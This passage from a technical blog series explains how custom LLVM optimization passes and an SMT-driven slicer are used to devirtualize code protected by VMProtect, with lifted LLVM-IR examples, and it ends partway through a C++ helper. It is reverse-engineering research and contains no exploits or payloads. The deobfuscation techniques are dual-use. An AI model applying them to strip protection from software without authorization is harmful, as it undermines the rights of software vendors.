define dso_local i64 @WhatDidYouDoToMySonYouEvilMonster(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = add i64 %1, -8
  %3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
  %4 = add i64 %1, -16
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = load i64, i64* %rax, align 8
  %7 = add i64 %1, -10
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 %6, i64* %9, align 1
  %10 = bitcast i8* %8 to i32*
  %11 = trunc i64 %6 to i32
  %12 = add i64 %1, -6
  %13 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %12
  %14 = bitcast i8* %13 to i32*
  store i32 %11, i32* %14, align 1
  %15 = bitcast i8* %13 to i16*
  %16 = trunc i64 %6 to i16
  %17 = add i64 %1, -4
  %18 = add i64 %1, -12
  %19 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %18
  %20 = bitcast i8* %19 to i64*
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %17
  %22 = bitcast i8* %21 to i16*
  %23 = load i16, i16* %22, align 1
  store i16 %23, i16* %15, align 1
  %24 = load i32, i32* %14, align 1
  %25 = shl i32 %24, 8
  %26 = bitcast i8* %21 to i32*
  store i32 %25, i32* %26, align 1
  %27 = bitcast i8* %3 to i16*
  store i16 %16, i16* %27, align 1
  %28 = bitcast i8* %8 to i16*
  store i16 %16, i16* %28, align 1
  %29 = load i32, i32* %10, align 1
  %30 = shl i32 %29, 8
  %31 = bitcast i8* %3 to i32*
  store i32 %30, i32* %31, align 1
  %32 = add i64 %1, -14
  %33 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %32
  %34 = add i64 %1, -2
  %35 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %34
  %36 = bitcast i8* %35 to i16*
  %37 = load i16, i16* %36, align 1
  store i16 %37, i16* %27, align 1
  %38 = add i64 %1, -18
  %39 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %38
  %40 = bitcast i8* %39 to i64*
  store i64 %6, i64* %40, align 1
  %41 = bitcast i8* %39 to i32*
  %42 = bitcast i8* %33 to i16*
  %43 = load i16, i16* %42, align 1
  %44 = bitcast i8* %19 to i16*
  %45 = load i16, i16* %44, align 1
  store i16 %45, i16* %42, align 1
  %46 = bitcast i8* %33 to i32*
  %47 = load i32, i32* %46, align 1
  %48 = shl i32 %47, 8
  %49 = bitcast i8* %19 to i32*
  store i32 %48, i32* %49, align 1
  %50 = bitcast i8* %5 to i16*
  store i16 %43, i16* %50, align 1
  %51 = bitcast i8* %39 to i16*
  store i16 %43, i16* %51, align 1
  %52 = load i32, i32* %41, align 1
  %53 = shl i32 %52, 8
  %54 = bitcast i8* %5 to i32*
  store i32 %53, i32* %54, align 1
  %55 = load i16, i16* %28, align 1
  store i16 %55, i16* %50, align 1
  %56 = load i32, i32* %54, align 1
  store i32 %56, i32* %49, align 1
  %57 = load i64, i64* %20, align 1
  store i64 %57, i64* %rax, align 8
  ret i64 5368713262
}

Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.

The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it is filling a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example the previous LLVM-IR snippet turns in the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?

define dso_local i64 @ThanksToLLVMMySonBswap64IsBack(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rax, align 8
  %2 = call i64 @llvm.bswap.i64(i64 %1)
  store i64 %2, i64* %rax, align 8
  ret i64 5368713262
}

PartialOverlapDSE

This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.

Applying the -O3 pipeline to the following example won’t remove the first 64 bits dead store at RAM[%0], even if the subsequent 64 bits stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.

define dso_local void @DSE(i64 %0) local_unnamed_addr #0 {
  %2 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %0
  %3 = bitcast i8* %2 to i64*
  store i64 1234605616436508552, i64* %3, align 1
  %4 = add i64 %0, -4
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = bitcast i8* %5 to i64*
  store i64 -6148858396813837381, i64* %6, align 1
  %7 = add i64 %0, 4
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 -3689348814455574802, i64* %9, align 1
  ret void
}

Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.

PointersHoisting

This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted, in fact it is just identifying all the pointers that could be safely hoisted to the entry block because depending solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.

As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.

define dso_local i64 @F_0x1400045b0(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = load i64, i64* %rcx, align 8
  %3 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %4 = extractvalue { i32, i32, i32, i32 } %3, 0
  %5 = extractvalue { i32, i32, i32, i32 } %3, 1
  %6 = and i32 %4, 4080
  %7 = icmp eq i32 %6, 4064
  %8 = xor i32 %4, 32
  %9 = select i1 %7, i32 %8, i32 %4
  %10 = and i32 %5, 16777215
  %11 = add i32 %9, %10
  %12 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %13 = add i64 %12, 288
  %14 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %13
  %15 = bitcast i8* %14 to i16*
  %16 = load i16, i16* %15, align 1
  %17 = zext i16 %16 to i32
  %18 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %19 = shl nuw nsw i32 %17, 7
  %20 = add i64 %18, 32
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %20
  %22 = bitcast i8* %21 to i32*
  %23 = load i32, i32* %22, align 1
  %24 = xor i32 %23, 2480
  %25 = add i32 %11, %19
  %26 = trunc i64 %18 to i32
  %27 = add i64 %18, 88
  %28 = xor i32 %25, %26
  br label %29

29:                                               ; preds = %37, %0
  %30 = phi i64 [ %27, %0 ], [ %38, %37 ]
  %31 = phi i32 [ %24, %0 ], [ %39, %37 ]
  %32 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %30
  %33 = bitcast i8* %32 to i32*
  %34 = load i32, i32* %33, align 1
  %35 = xor i32 %34, 30826
  %36 = icmp eq i32 %28, %35
  br i1 %36, label %41, label %37

37:                                               ; preds = %29
  %38 = add i64 %30, 8
  %39 = add i32 %31, -1
  %40 = icmp eq i32 %31, 1
  br i1 %40, label %86, label %29

41:                                               ; preds = %29
  %42 = add i64 %1, 40
  %43 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %42
  %44 = bitcast i8* %43 to i32*
  %45 = load i32, i32* %44, align 1
  %46 = add i64 %1, 36
  %47 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %46
  %48 = bitcast i8* %47 to i32*
  store i32 %45, i32* %48, align 1
  %49 = icmp ugt i32 %45, 5
  %50 = zext i32 %45 to i64
  %51 = add i64 %1, 32
  br i1 %49, label %81, label %52

52:                                               ; preds = %41
  %53 = shl nuw nsw i64 %50, 1
  %54 = and i64 %53, 4294967296
  %55 = sub nsw i64 %50, %54
  %56 = shl nsw i64 %55, 2
  %57 = add nsw i64 %56, 5368964976
  %58 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %57
  %59 = bitcast i8* %58 to i32*
  %60 = load i32, i32* %59, align 1
  %61 = zext i32 %60 to i64
  %62 = add nuw nsw i64 %61, 5368709120
  switch i32 %60, label %66 [
    i32 1465288, label %63
    i32 1510355, label %78
    i32 1706770, label %75
    i32 2442748, label %72
    i32 2740242, label %69
  ]

63:                                               ; preds = %52
  %64 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %65 = bitcast i8* %64 to i32*
  store i32 9, i32* %65, align 1
  br label %66

66:                                               ; preds = %52, %63
  %67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %68 = bitcast i8* %67 to i32*
  store i32 20, i32* %68, align 1
  br label %69

69:                                               ; preds = %52, %66
  %70 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %71 = bitcast i8* %70 to i32*
  store i32 30, i32* %71, align 1
  br label %72

72:                                               ; preds = %52, %69
  %73 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %74 = bitcast i8* %73 to i32*
  store i32 55, i32* %74, align 1
  br label %75

75:                                               ; preds = %52, %72
  %76 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %77 = bitcast i8* %76 to i32*
  store i32 99, i32* %77, align 1
  br label %78

78:                                               ; preds = %52, %75
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %80 = bitcast i8* %79 to i32*
  store i32 100, i32* %80, align 1
  br label %81

81:                                               ; preds = %41, %78
  %82 = phi i64 [ %62, %78 ], [ %50, %41 ]
  %83 = phi i64 [ 5368709120, %78 ], [ %2, %41 ]
  %84 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %85 = bitcast i8* %84 to i32*
  store i32 22, i32* %85, align 1
  store i64 %83, i64* %rcx, align 8
  br label %86

86:                                               ; preds = %37, %81
  %87 = phi i64 [ %82, %81 ], [ 3735929054, %37 ]
  %88 = phi i64 [ 5368727067, %81 ], [ 0, %37 ]
  store i64 %87, i64* %rax, align 8
  ret i64 %88
}

When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.

define dso_local i64 @F_0x1400045b0(i64* noalias nocapture nonnull align 8 dereferenceable(8) %0, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %1, i64* noalias nocapture nonnull align 8 dereferenceable(8) %2, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %3, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %4, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %5, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %6, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %7, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %16, i64 %17, i64 %18, i64 %19) local_unnamed_addr {
  %21 = load i64, i64* %7, align 8
  %22 = load i64, i64* %2, align 8
  %23 = tail call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %24 = extractvalue { i32, i32, i32, i32 } %23, 0
  %25 = extractvalue { i32, i32, i32, i32 } %23, 1
  %26 = and i32 %24, 4080
  %27 = icmp eq i32 %26, 4064
  %28 = xor i32 %24, 32
  %29 = select i1 %27, i32 %28, i32 %24
  %30 = and i32 %25, 16777215
  %31 = add i32 %29, %30
  %32 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %33 = add i64 %32, 288
  %34 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %33
  %35 = bitcast i8* %34 to i16*
  %36 = load i16, i16* %35, align 1
  %37 = zext i16 %36 to i32
  %38 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %39 = shl nuw nsw i32 %37, 7
  %40 = add i64 %38, 32
  %41 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %40
  %42 = bitcast i8* %41 to i32*
  %43 = load i32, i32* %42, align 1
  %44 = xor i32 %43, 2480
  %45 = add i32 %31, %39
  %46 = trunc i64 %38 to i32
  %47 = add i64 %38, 88
  %48 = xor i32 %45, %46
  %49 = add i64 %21, 32
  %50 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %49
  br label %51

  %52 = phi i64 [ %47, %20 ], [ %60, %59 ]
  %53 = phi i32 [ %44, %20 ], [ %61, %59 ]
  %54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
  %55 = bitcast i8* %54 to i32*
  %56 = load i32, i32* %55, align 1
  %57 = xor i32 %56, 30826
  %58 = icmp eq i32 %48, %57
  br i1 %58, label %63, label %59

  %60 = add i64 %52, 8
  %61 = add i32 %53, -1
  %62 = icmp eq i32 %53, 1
  br i1 %62, label %88, label %51

  %64 = add i64 %21, 40
  %65 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %64
  %66 = bitcast i8* %65 to i32*
  %67 = load i32, i32* %66, align 1
  %68 = add i64 %21, 36
  %69 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %68
  %70 = bitcast i8* %69 to i32*
  store i32 %67, i32* %70, align 1
  %71 = icmp ugt i32 %67, 5
  %72 = zext i32 %67 to i64
  br i1 %71, label %84, label %73

  %74 = shl nuw nsw i64 %72, 1
  %75 = and i64 %74, 4294967296
  %76 = sub nsw i64 %72, %75
  %77 = shl nsw i64 %76, 2
  %78 = add nsw i64 %77, 5368964976
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %78
  %80 = bitcast i8* %79 to i32*
  %81 = load i32, i32* %80, align 1
  %82 = zext i32 %81 to i64
  %83 = add nuw nsw i64 %82, 5368709120
  br label %84

  %85 = phi i64 [ %83, %73 ], [ %72, %63 ]
  %86 = phi i64 [ 5368709120, %73 ], [ %22, %63 ]
  %87 = bitcast i8* %50 to i32*
  store i32 22, i32* %87, align 1
  store i64 %86, i64* %2, align 8
  br label %88

  %89 = phi i64 [ %85, %84 ], [ 3735929054, %59 ]
  %90 = phi i64 [ 5368727067, %84 ], [ 0, %59 ]
  store i64 %89, i64* %0, align 8
  ret i64 %90
}

ConstantConcretization

This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.

As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.

Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.

The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:

  • A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
  • A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.

In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.

In the first case, the address is directly available and the associated value can be resolved simply parsing the binary.

In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be really laying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, that we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98

The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:

.rdata:0x14003E770 dd 0x165BC8
.rdata:0x14003E774 dd 0x9ED9B
.rdata:0x14003E778 dd 0x29D012
.rdata:0x14003E77C dd 0x2545FC
.rdata:0x14003E780 dd 0x1A0B12
.rdata:0x14003E784 dd 0x170BD3

If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15

Unsupported instructions

It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).

The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.

This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and a better registers allocation during the recompilation phase.

An example of the lifted unsupported instruction rdtsc follows:

define void @Unsupported_rdtsc(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = tail call %IAOutTy.0 asm sideeffect inteldialect "rdtsc", "={eax},={edx}"() #1
  %3 = bitcast %ContextTy* %0 to i32*
  %4 = extractvalue %IAOutTy.0 %2, 0
  store i32 %4, i32* %3, align 4
  %5 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %6 = bitcast %RegisterW* %5 to i32*
  %7 = extractvalue %IAOutTy.0 %2, 1
  store i32 %7, i32* %6, align 4
  ret void
}

An example of the lifted unsupported instruction cpuid follows:

define void @Unsupported_cpuid(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = bitcast %ContextTy* %0 to i32*
  %3 = load i32, i32* %2, align 4
  %4 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 2, i32 0
  %5 = bitcast %RegisterW* %4 to i32*
  %6 = load i32, i32* %5, align 4
  %7 = tail call %IAOutTy asm sideeffect inteldialect "cpuid", "={eax},={ecx},={edx},={ebx},{eax},{ecx}"(i32 %3, i32 %6) #1
  %8 = extractvalue %IAOutTy %7, 0
  store i32 %8, i32* %2, align 4
  %9 = extractvalue %IAOutTy %7, 1
  store i32 %9, i32* %5, align 4
  %10 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %11 = bitcast %RegisterW* %10 to i32*
  %12 = extractvalue %IAOutTy %7, 2
  store i32 %12, i32* %11, align 4
  %13 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 1, i32 0
  %14 = bitcast %RegisterW* %13 to i32*
  %15 = extractvalue %IAOutTy %7, 3
  store i32 %15, i32* %14, align 4
  ret void
}

Recompilation

I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:

  • If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
  • If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.

The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.

Results showcase

The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):

  • [email protected]: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
  • [email protected]: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
  • [email protected]: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
  • [email protected]: DllEntryPoint, calling another internal function (intra-call);
  • [email protected]: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
  • [email protected]: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
  • [email protected]: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.

Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.

Afterword

I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.

The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.

Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.

I’d like to thank:

  • Peter, for introducing me to LLVM and working on SATURN together.
  • mrexodia and mrphrazer, for the in-depth review of the posts.
  • justmusjle, for enhancing the colors used by the diagrams.
  • Secret Club, for their suggestions and series hosting.

See you at the next LLVM adventure!

Tickling VMProtect with LLVM: Part 2

8 September 2021 at 23:00

This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.

Poor man’s slicer

Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.

In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:

extern "C"
size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
